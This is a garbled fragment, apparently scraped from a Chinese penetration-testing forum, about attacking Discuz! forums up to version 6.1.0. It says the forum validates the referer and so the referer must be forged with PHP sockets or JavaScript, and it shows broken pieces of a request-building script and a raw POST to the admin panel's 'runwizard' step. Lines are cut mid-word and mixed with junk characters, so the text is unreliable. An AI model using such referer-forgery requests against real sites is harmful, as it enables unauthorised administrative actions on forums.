iscuz<=6.1.0,gbk+utf+big5# D9 A# f& P' ^* \3 l, N
ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");& K+ F4 g5 r5 l5 G- ^
HP SOCKET利用方法首先打开racle.js| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |